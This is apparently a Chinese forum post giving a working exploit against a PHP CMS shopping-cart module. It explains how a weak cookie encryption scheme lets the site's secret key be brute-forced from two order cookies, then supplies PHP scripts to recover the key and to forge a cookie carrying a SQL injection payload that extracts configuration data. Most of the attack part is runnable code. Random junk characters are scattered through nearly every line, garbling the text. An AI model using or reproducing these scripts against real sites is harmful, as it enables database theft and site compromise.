www.xxx.com/plus/search.php?keyword=4 ]8 p' s/ \" ~ f: @( o
在 include/shopcar.class.php中! b: n6 X+ N. p0 y
先看一下这个shopcar类是如何生成cookie的2 A- e+ y; e8 t, h
239 function saveCookie($key,$value)# K: X* |. \. z
240 {) a. L, C9 \% @+ q' p8 h9 E6 b
241 if(is_array($value))
5 l; S! Z2 G$ l2 ?242 {
0 M9 l& I4 n9 q0 P8 t243 $value = $this->enCrypt($this->enCode($value));1 u; O t2 d' W; W, @7 w
244 }3 ]+ P5 W) M% U, m. K
245 else% q8 z2 R4 `! R! o( l1 e$ l- E' `+ V
246 {
6 D/ L# q* Y: o1 F247 $value = $this->enCrypt($value);8 H! O) \, a# e2 w6 |& O7 u
248 }: I3 e- n0 x/ l
249 setcookie($key,$value,time()+36000,’/');
$ q6 M# `( x% T; L250 }% f4 s7 P: R( C' d
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数# L0 @4 I' G% u. W; }
186 function enCrypt($txt)
+ W6 F# x) T- ?- ]: O. t2 s187 {5 w+ `3 Y. i" {* ]. C
188 srand((double)microtime() * 1000000);. R, |1 E( J1 x" z
189 $encrypt_key = md5(rand(0, 32000));- m$ y+ j, {# |+ A4 [9 D R4 N
190 $ctr = 0;
& I) c6 ^( b+ G: W191 $tmp = ”;
" h; p5 y3 r5 B" t7 E192 for($i = 0; $i < strlen($txt); $i++); s* p/ x+ ^6 J! ], |' r. A- a N
193 {$ P3 j3 h; X6 L& O8 t
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
, E* _3 K1 P( M! B% \9 e195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);# v0 `. x$ [ H+ j7 t+ ~& _) U' }2 s
196 }
# Z" e% m' D5 ?8 m197 return base64_encode($this->setKey($tmp));
3 ?- V* P* _2 g( E9 x8 M8 i! h v198 }$ a4 `- n" H) Y4 ]% k* _
213 function setKey($txt)
' y. e$ T) q8 R" X$ _214 {9 F; c4 {2 ~1 z+ \& d
215 global $cfg_cookie_encode;
/ P0 x) P7 @0 w6 o216 $encrypt_key = md5(strtolower($cfg_cookie_encode));! Y1 Y' ~7 x+ r, n( ?1 }# `
217 $ctr = 0;
- w" V( f) X: d o218 $tmp = ”;
4 |9 s# m3 l/ B219 for($i = 0; $i < strlen($txt); $i++)* r; m% W- q1 \9 n8 A; `2 @7 t/ k
220 {6 C5 _' g+ b1 e3 M
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;8 ]6 A# U& @4 L4 o7 G6 N
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];# [) f' @8 L1 \6 P- |; c5 H, ]
223 }
+ z) v; ?0 C" b2 m5 @ A224 return $tmp;( v# e' J( Q9 i& U& D+ S
225 }
$ f G. u: I6 D) J3 [+ a# H, U WenCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的% G% \1 [ k( s2 t* J/ ]# h8 w
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。- e, h! |; d* H% Q5 o& H
具体代码如下:
: n# u8 [' C! N<?php& `+ l8 g) G; }- z. n
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
5 q8 F4 H8 @! X u! f$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
( q7 ~% u$ M# z6 o$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
8 T" @& Y& [/ N1 m( A9 z: Wfunction reStrCode($code,$string). G3 ^2 J" w2 [+ |- ]6 v* v b' W
{" [8 ~8 _/ D& U, Z m Y1 w
$code = base64_decode($code);8 X. u Q/ y% u$ ~: z
$key = “”;) a9 D( p0 N7 @
for($i=0 ; $i<32 ; $i++)
/ k* `5 X# L$ B+ u! ?( r{
! O$ [% j7 q' `) O$key .= $string[$i] ^ $code[$i];2 H9 a( G) `( V/ Y, A
}
% e! `6 B/ A1 E g" v/ ]return $key;
; Y5 ^* i& _; c6 s4 H2 h8 G) V: r}
7 m! S4 N$ U% \, Y6 i- sfunction getKeys($cookie,$plantxt)
2 R2 \0 W5 G1 i2 Q7 M) r{
3 u& I/ J7 C6 A. L$tmp = $cookie;
+ R- J6 l. _6 s& X6 F Y3 H9 G$results = array();& h z% j+ [) s/ ?. J% o9 ]
for($j=0 ; $j < 32000; $j++)
# m1 |5 t. _: ]{
M+ X4 {; C" t0 P( ?" b% G0 n7 Y2 g8 o
$txt = $plantxt;
. h! \( g# {# y ?7 o7 t: u$ctr = 0;
0 p$ m5 T, B' X& P. N1 w" o$tmp = ”;- l2 P1 v' D6 w7 _
$encrypt_key = md5($j);
( D% u p1 @( H: Bfor($i =0; $i < strlen($txt); $i ++): {& t( L, V0 D5 r
{
8 O& d! ]: I0 I$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;& e5 f6 ~4 C1 l" C& Z- z9 L$ p0 T% |
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);3 q( z, j! S9 u# d5 p. ~( i
}
1 C: s, h, k! w) E* b$string = $tmp;
. _8 `, m W! I; ~2 ? s4 H5 ^* p* i$code = $cookie;: Q! }% O; h1 l& J& g: E
$result = reStrCode($code,$string);
6 `$ M6 E6 |( {% {if(eregi(‘^[a-z0-9]+$’,$result))
" K- p2 @/ r2 ?* A5 j{* r, b- B2 P' @& G! `5 J
echo $result.”\n”;
( s8 ^2 v$ I# l, S4 p4 N$results[] = $result;, I( e% D2 b4 v
}
1 ^( [. A; p+ I* t1 n, z}( q) g( [) K8 y
return $results;
5 W! }5 D9 N% J! J+ R) m; O. f}
/ L4 f) U5 a8 V7 ]: G5 I" _7 B v( ?! o$results1 = getKeys($cookie1,$plantxt);6 Y5 w& m& Q3 \- n/ x$ c
$results2 = getKeys($cookie2,$plantxt);
' X9 Z) x0 n7 B/ m" s4 l# wprint “\n——————–real key————————–\n”;2 x' B2 B8 U: c9 ~2 ~
foreach($results1 as $test1)
2 D$ J9 @8 q8 u9 Q# S/ Q{0 |$ v, w4 p/ O- Q
foreach($results2 as $test2)4 @" a; Y5 E* m( f
{
2 f5 i, H- V1 c6 }6 _$ S- X9 E; fif($test1 == $test2)9 K8 q; H0 X. ^ m0 u O' O0 Y ^9 y5 V
{( C$ P" ]) B& Q3 j/ F2 J
echo $test1.”\n”;/ L& j& y% O b& z1 O6 Y
}( G9 o" ^( ?7 o/ `
}
' L- ?2 \1 j- g' ~}
4 n: q$ n! n$ W2 V3 Q4 T8 J?>
' h: K: D5 W) D* Ccookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
! h8 @2 V+ T! }8 E* u! H' n( kplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
/ Q' C+ P9 x# D( d0 w9 u; T$ d然后推算出md5(strtolower($cfg_cookie_encode))' a1 D9 L0 p! n F+ E+ P7 j2 O" S& s
得到这个key之后,我们就可以构造任意购物车的cookie
' k0 ^" {4 t" s8 v J接着看
) V d9 l/ R8 k20 class MemberShops- G$ f0 f9 h- i! P" ~
21 {
* F; s; h. H* m0 `22 var $OrdersId;7 i1 B$ B2 z: U# M; R# X( ~
23 var $productsId;- r8 G9 G+ H0 ~ I# I# o& J/ i! N
24
) i0 j8 K" y9 p25 function __construct()& n0 k; Q! q2 t' C6 q
26 {' k, u0 M5 Z+ P. ]2 K8 L
27 $this->OrdersId = $this->getCookie(“OrdersId”);
6 y a+ Y' f" v( G. Q% |28 if(empty($this->OrdersId))" P; L6 ~, n7 T$ U6 Y5 D
29 {
0 |9 B/ s {: z30 $this->OrdersId = $this->MakeOrders();) M+ r- F% G6 k; f0 f7 [ g
31 }
" e/ ]: q& m2 H" C32 } {( e4 E u" x" p. g
发现OrderId是从cookie里面获取的
5 E( _" Y( N( H/ ]# A然后1 \5 n7 o6 \7 N4 w4 h8 @2 E
/plus/carbuyaction.php中的
1 c R" u6 j1 ]8 F: D- J29 $cart = new MemberShops();" j) c# p6 c7 z8 i2 p; p
39 $OrdersId = $cart->OrdersId; //本次记录的订单号( l& F& d, A6 r7 T. T
……3 A/ R- `8 d+ n& U. E- X
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);, ^ H4 k! w; }& V, W2 P8 m7 i
接着我们就可以注入了
6 z( _& n' o+ |" b/ S; g+ k: p* ? k通过利用下面代码生成cookie:
- P2 @/ C' S j& L<?php! j2 `+ M" z: o( E; M7 P3 w/ e
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;( q& c# C, X& z% |
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here9 E" y2 T( ]+ y" T! h
function setKey($txt); w+ o$ M) D3 c
{8 a$ k* u4 Z' ~: U0 V
global $encrypt_key;
6 S B/ w; y6 ^$ctr = 0;
5 ^# ?% \( Z& T5 B1 J4 ^5 l$tmp = ”;. P. f6 O- k9 G
for($i = 0; $i < strlen($txt); $i++)
1 S# `6 W, r( Q$ z0 q) t- X9 V- \' T- n6 B{
# r7 E/ U( _; H( s4 n$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
6 @3 Y: C5 p" W2 N* W+ m$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
. p/ V& T2 e" G5 j( y" P( Y}
2 D! v% e& g5 N' T+ W. E9 f* freturn $tmp;
! Y. O1 j0 P( l! }4 _4 b}
7 e" O" T2 f2 H$ Z* b) j, Ifunction enCrypt($txt)% T- M) d7 O& k+ ]/ J/ L9 q9 v- ?
{, r, m: D& S" |! M/ B% U+ _1 n
srand((double)microtime() * 1000000);: J% ]8 U3 @9 b: O
$encrypt_key = md5(rand(0, 32000));
* c: ]+ _; s) A# x* c' ?$ctr = 0;: `# j3 z/ l5 W5 g0 \/ I& ]
$tmp = ”; X' }1 [/ F' v9 [7 T4 n3 B6 y9 q% c
for($i = 0; $i < strlen($txt); $i++)% H; k2 r ^! B- `6 e
{4 M3 X1 Z/ P+ \+ v5 }2 b. ~
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
1 C, W/ ^; r; I/ g b" l: ?$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);1 S: c. k: f9 [9 Z% \0 a) U
}
- N% E& |0 ^3 e) ^7 s* dreturn base64_encode(setKey($tmp));
6 A0 P, o! Q- T0 x& L% T1 z! }% D, P3 E$ F}% c1 t/ c5 O% Z& _5 u, B
for($dest =0;$dest = enCrypt($txt);)
7 p, Y' z4 v- ]. ]9 H, M/ p& ?{
# m& l8 I; N! C, | L U* Kif(!strpos($dest,’+'))
) J; h& n) V0 o3 `7 r8 l0 u( j9 G{5 `% \& \0 p1 a' @
break;
# n e) w9 k$ J}; I$ o8 N5 m2 I/ b* j2 U: D2 l
}
& t# L3 h( k) q5 Zecho $dest.”\n”;# T) {* L( V* C, j# v
?>
8 G$ o3 @' c. V4 A0 r- N- x$ F5 m7 _/ x2 A$ }6 i0 P# O
|
发表于 2013-2-13 23:58:29
收藏
分享
支持
反对